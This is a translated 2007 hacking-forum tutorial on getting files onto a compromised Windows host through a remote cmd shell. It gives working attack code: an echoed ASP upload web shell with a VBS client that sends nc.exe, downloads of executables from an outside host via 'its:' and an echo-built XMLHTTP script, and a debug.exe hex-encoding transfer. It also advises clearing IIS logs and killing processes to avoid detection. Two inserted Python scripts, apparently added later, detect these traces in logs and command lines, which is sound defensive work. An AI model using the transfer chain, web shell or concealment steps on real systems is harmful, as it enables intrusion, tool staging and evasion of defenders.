Encyclopedia of Intrusion Techniques in Cmd Mode
Author: Anonymous (佚名), Heiba Security Net (www.myhack58.com), May 28, 2007, MYHACK58:62200715629

Foreword
The cmd shell (command-line interaction) is an eternal topic among hackers: it has a long history and it endures.
This article introduces and summarises some techniques for controlling Windows systems from the command line. Wherever possible, these methods use only the tools that ship with the system.

File transfer
When a cmd shell is obtained through an overflow vulnerability, the biggest problem is how to upload files. Since worms became widespread, the ports that an ipc$ connection needs (139 or 445) are blocked at the router, and Windows XP has strengthened the protection of ipc$, so uploading through ipc$ and the default shares is now largely ineffective. ftp and tftp are two workable methods, but they are already well known and are not covered here. There are three other familiar approaches, which I mention here as a summary:

  1. Use the echo command to write an ASP Trojan.
    This of course requires that the target host already has IIS installed.
    ASP Trojans are generally large and not suited to being written out with echo, so here I offer a small one.
    Given directly as an echo command:

@echo ^<%with server.createobject("adodb.stream"):.type=1:.open:.write request.binaryread(request.totalbytes):.savetofile server.mappath(request.querystring("s")),2:end with%^> >up.asp

Note that this is a single line with no carriage return inside it.
The generated up.asp cannot be used from a browser; it can only be driven by the following script:

with wscript
if .arguments.count<3 then .quit
url=.arguments(0)&"?s="&.arguments(2)
fn=.arguments(1)
end with
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fn:s=.read:.close
end with
with createobject("microsoft.xmlhttp")
.open "post",url,false:.send s
wscript.echo .statustext
end with

Save it as up.vbs. Assume the target IP is 123.45.67.89, up.asp is in the IIS virtual root directory, and the file to upload is nc.exe, to be saved as mm.exe after the upload. The corresponding command is:

cscript up. vbs http://123.45.67.89/up.asp nc.exe mm.exe

Note that this command is executed on the local command line; don't get that wrong. Also, an upload through IIS is recorded in the IIS log, so remember to clear it.
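The IIS log entry that the upload leaves behind is also what a defender can look for. The following is an added example and not code from the original article: a small Python parser for IIS W3C extended log lines that flags a POST to an .asp page whose query string names an executable file, which is the trace that driving up.asp with up.vbs produces. The log excerpt, its field list and the client addresses are constructed for this example; the 59392-byte request body is the size of the nc.exe transferred later in the article.

```python
"""Added example: spot script-driven binary uploads to an ASP page in IIS W3C logs.

Not part of the original article. The log excerpt, the field list and all
addresses are constructed for this example.
"""
import re

# Constructed W3C extended log excerpt. IIS writes spaces inside a field as '+',
# so each record splits cleanly on whitespace.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status cs-bytes
2007-05-28 03:14:07 123.45.67.89 GET /index.asp - 80 - 10.0.0.5 Mozilla/4.0+(compatible;+MSIE+6.0) 200 312
2007-05-28 03:14:52 123.45.67.89 POST /up.asp s=mm.exe 80 - 10.0.0.5 Mozilla/4.0+(compatible;+MSIE+6.0) 200 59392
2007-05-28 03:15:10 123.45.67.89 POST /login.asp - 80 - 10.0.0.7 Mozilla/4.0+(compatible;+MSIE+6.0) 200 184
2007-05-28 03:16:01 123.45.67.89 GET /up.asp - 80 - 10.0.0.5 Mozilla/4.0+(compatible;+MSIE+6.0) 500 0
"""

# File types an attacker would want written to disk through such a page.
EXECUTABLE_EXT = re.compile(r"\.(exe|dll|com|bat|cmd|vbs|js|scr)$", re.I)


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the last #Fields: line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        values = line.split()
        if fields and len(values) == len(fields):
            yield dict(zip(fields, values))


def suspicious_uploads(text, min_body=4096):
    """Return (client, uri, query, reasons) for POSTs to .asp pages that look like
    a file drop: the query string names an executable, and/or the body is large."""
    hits = []
    for rec in parse_w3c(text):
        if rec["cs-method"] != "POST" or not rec["cs-uri-stem"].lower().endswith(".asp"):
            continue
        query = rec["cs-uri-query"]
        reasons = []
        # The article's up.asp takes the destination file name from querystring("s").
        if any(EXECUTABLE_EXT.search(v) for v in re.findall(r"=([^&]*)", query)):
            reasons.append("query names executable file")
        body = int(rec.get("cs-bytes", "0") or 0)
        if body >= min_body:
            reasons.append(f"request body {body} bytes")
        if reasons:
            hits.append((rec["c-ip"], rec["cs-uri-stem"], query, reasons))
    return hits


if __name__ == "__main__":
    for client, uri, query, reasons in suspicious_uploads(SAMPLE_LOG):
        print(f"{client} POST {uri}?{query}: {'; '.join(reasons)}")
```

The query-string rule is the specific one; the body-size rule on its own is noisy on sites that accept legitimate form uploads, so it is reported as a second reason rather than used alone. Run the script directly to print the hits, or call suspicious_uploads() on the text of a real log file.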

  2. Automatically download to the web cache.
    For example: start its:http://www.sometips.com/soft/ps.exe

Executing the above command in the remote shell downloads ps.exe into the target host's web page cache directory. Then:

cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5"
dir /s ps[1].exe

This gives the specific location of ps.exe (it differs on each host), for example:

 Directory of C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\AB094JIT

2004-01-24  14:24             49,152 ps[1].exe
               1 File(s)         49,152 bytes

Finally:
copy AB094JIT\ps[1].exe c:\path\ps.exe
del AB094JIT\ps[1].exe

Additional information:
For a backdoor shell started as a service, the user identity is generally System, and the web cache directory is then located as shown in the example. If the shell's identity is not System, replace Default User with the corresponding user name.
This method starts an IE process; remember to kill it. If the shell runs as System, no window appears locally to give it away.
Also, using ms-its instead of its has exactly the same effect.

  3. Echo a script that downloads a web resource.
    A ready-made tool is iGet.vbs. Here I give a version that includes the necessary error handling.
    Again as an echo version:

@echo with wscript:if .arguments.count^<2 then .quit:end if >dl.vbs
@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:" web.status:.quit >>dl.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbs

Example: download ps.exe and save it under c:\path:

cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe

Note that this one is executed in the remote shell.

  4. Echo an encoded copy of any file, then restore it with a script plus debug.
    The previous two approaches are not guaranteed to get through a firewall. Moreover, unless you host the web server yourself, web resources are generally in compressed-archive form, and if the target host has no decompression tool there is no choice but the "killer" below.

The echo command's redirection operator can write characters with ASCII codes below 128, but not those of 128 or above. So only by re-encoding the local file into displayable characters can it be written easily to the remote host. The first thing that comes to mind is base64, the encoding used for e-mail attachments, but VBS does not support bit operations, so encoding and decoding become rather complex. Worse, scripts are very poor at handling binary data streams. (ADODB.Stream can write files in stream mode, but I cannot construct the corresponding data type; a binary stream can be converted to a string with the midb function, but not the other way round. I spent two days on this and still could not solve it. If anyone can write arbitrary byte data to a file with VBS or JS, please enlighten me.)

With no alternative, I fall back on debug.exe. Many people know the principle, so I won't explain it; here is the finished encoding script:

fp=wscript.arguments(0)
fn=right(fp,len(fp)-instrrev(fp,"\"))
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl\65536
with createobject("scripting.filesystemobject").opentextfile(fp&".bat",2,true)
.write "@echo str="""
for i=1 to sl
bt=ascb(midb(str,i,1))
if bt<16 then .write "0"
.write hex(bt)
if i mod 128=0 then .write """+_>>debug.vbs"+vbcrlf+"@echo """
next
.writeline """>>debug.vbs"+vbcrlf+"@echo with wscript.stdout:r=vbcrlf"+_
":for i=1 to len(str) step 48:.write ""e""+hex(256+(i-1)/2)"+_
":for j=i to i+46 step 2:.write "" ""+mid(str,j,2):next:.write r:next>>debug.vbs"
.writeline "@echo .write ""rbx""+r+"""+hex(slh)+"""+r+""rcx""+r+"""+hex(sll)+_
"""+r+""n debug.tmp,""+r+""w""+r+""q""+r:end with"+_
">>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp """&fn&"""&&del debug.vbs"
end with

Save it as echo.vbs. Suppose you want to upload nc.exe; then enter at the local command line:

cscript echo.vbs nc.exe

You can also simply drag the icon of the file to be transferred onto the script file's icon.
After a moment, an nc.exe.bat is generated in the current directory. Opening it with Notepad or another editor shows the following:

@echo str="4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000"+_>>debug.vbs
@echo "504500004C010400B98EAE340000000000000000E0000F010B010500009800000062000000000000004C00000010000000B0000000004000001000000002000004000000000000000400000000000000003001000004000000000000030000000000100000100000000010000010000000000000100000000000000000000000"+_>>debug.vbs
@echo "002001003C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0210100640100000000000000000000000000000000000000000000000000002E74657874000000"+_>>debug.vbs
@echo "70970000001000000098000000040000000000000000000000000000200000602E726461746100001704000000B0000000060000009C0000000000000000000000000000400000402E646174610000004452000000C00000003E000000A20000000000000000000000000000400000C02E696461746100005C07000000200100"+_>>debug.vbs

... (a number of lines omitted)

@echo "">>debug.vbs
@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write "e"+hex(256+(i-1)/2):for j=i to i+46 step 2:.write " "+mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write "rbx"+r+"0"+r+"rcx"+r+"E800"+r+"n debug.tmp,"+r+"w"+r+"q"+r:end with>>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp "NC.EXE"&&del debug.vbs

Select all, copy, switch to the remote command-line window, and paste.
If the network is not very slow, the whole upload takes about 20 seconds.

Some points to note:

  1. Transfers of large files are unstable and may kill the shell, so the smaller the file the better. I recommend that the original file not exceed 100KB.
  2. Before transferring a large file, you can first transfer a small one as a "warm-up", so that the 16-bit virtual machine ntvdm.exe stays resident in the background. Once all transfers are finished, kill the ntvdm process for concealment.
  3. Some cmd shells require two carriage returns after each command, so nc.exe.bat cannot be used with them directly.
  4. The length of a single command is limited, so the whole job cannot be done with one echo. Moreover, with the cmd shell provided by nc, slightly longer commands make the shell exit automatically (an overflow?). You can change the 128 in the statement "i mod 128=0" to adjust the length of each echo command; the number of characters echoed each time is twice this number.
  5. The decoding can also be done without the script. The script is there to reduce the amount of data transmitted, in the way compressing the data would. If I have time I'll write a more complete script, with stronger data compression and a data check function.
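Each of the transfer methods above leaves a characteristic command line behind: a start its:/ms-its: URL, echo lines assembling a .vbs around microsoft.xmlhttp and adodb.stream, a hex-encoded MZ header (4D5A) echoed into debug.vbs, cscript piped into debug.exe followed by the rename, and the resident ntvdm.exe the notes mention. The following is an added example, not from the original article, written from the detection side: Python that classifies process-creation records against those patterns. The records are constructed (the image/cmdline field names are an assumption about whatever process-audit source you have), but the command lines themselves are taken from the article's own examples.

```python
"""Added example: classify process-creation command lines against the
command-line file-transfer patterns described in the article.

Not part of the original article. The records below are constructed; the
field names (image, cmdline) are an assumption about the audit source.
"""
import re

# Each rule: (name, compiled pattern over the full command line).
RULES = [
    # 'start its:' / 'start ms-its:' pulls a URL into the IE cache without a visible browser.
    ("its-protocol download", re.compile(r"\b(?:ms-)?its:\S+", re.I)),
    # echo lines assembling a .vbs that uses the XMLHTTP + ADODB.Stream download pair.
    ("echo-built download script",
     re.compile(r"\becho\b.*(?:xmlhttp|adodb\.stream|responsebody).*>>?\s*\S+\.vbs", re.I | re.S)),
    # A hex-encoded PE header ('MZ' = 4D5A) inside an echo: the debug.exe transfer.
    ("hex-encoded PE in echo", re.compile(r"\becho\b.*\b4D5A(?:[0-9A-F]{2}){14,}", re.I)),
    # cscript output piped into debug.exe, then the produced file renamed.
    ("debug.exe decode chain", re.compile(r"cscript.*\|\s*debug\.exe.*\bren\b", re.I)),
]

# The 16-bit subsystem host that debug.exe runs inside; rarely seen on servers.
NTVDM = re.compile(r"(?:^|\\)ntvdm\.exe$", re.I)


def classify(record):
    """Return the list of rule names an {image, cmdline} record matches."""
    names = [name for name, pat in RULES if pat.search(record["cmdline"])]
    if NTVDM.search(record["image"]):
        names.append("ntvdm.exe started")
    return names


# Constructed audit records; the suspicious command lines are the article's own examples.
SAMPLE_RECORDS = [
    {"image": r"C:\WINDOWS\system32\cmd.exe", "cmdline": r"cmd.exe /c echo backup done > C:\logs\job.txt"},
    {"image": r"C:\WINDOWS\system32\cmd.exe", "cmdline": r"cmd.exe /c start its:http://www.sometips.com/soft/ps.exe"},
    {"image": r"C:\WINDOWS\system32\cmd.exe",
     "cmdline": r'cmd.exe /c @echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>dl.vbs'},
    {"image": r"C:\WINDOWS\system32\cmd.exe",
     "cmdline": r'cmd.exe /c @echo str="4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000">>debug.vbs'},
    {"image": r"C:\WINDOWS\system32\cmd.exe",
     "cmdline": r'cmd.exe /c cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp "NC.EXE"&&del debug.vbs'},
    {"image": r"C:\WINDOWS\system32\ntvdm.exe", "cmdline": r"C:\WINDOWS\system32\ntvdm.exe"},
    {"image": r"C:\WINDOWS\system32\cscript.exe", "cmdline": r"cscript.exe C:\scripts\inventory.vbs"},
]


def scan(records):
    """Return [(cmdline, [rule names])] for records that match at least one rule."""
    return [(r["cmdline"], hits) for r in records if (hits := classify(r))]


if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_RECORDS):
        print(f"{', '.join(hits)}: {cmdline}")
```

The patterns key on the parts of each chain that the attacker cannot easily drop (the protocol handler, the download objects, the MZ header, the pipe into debug.exe), rather than on file names such as dl.vbs or debug.tmp that note 4 already shows are trivially changed. Feed scan() a list of records from your own process-audit source to use it beyond the constructed sample.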

Once you can upload files, everything else is of course easy to arrange. But many operations are more convenient with the tools built into Windows, so when you look around for the tool you need, don't forget Windows itself.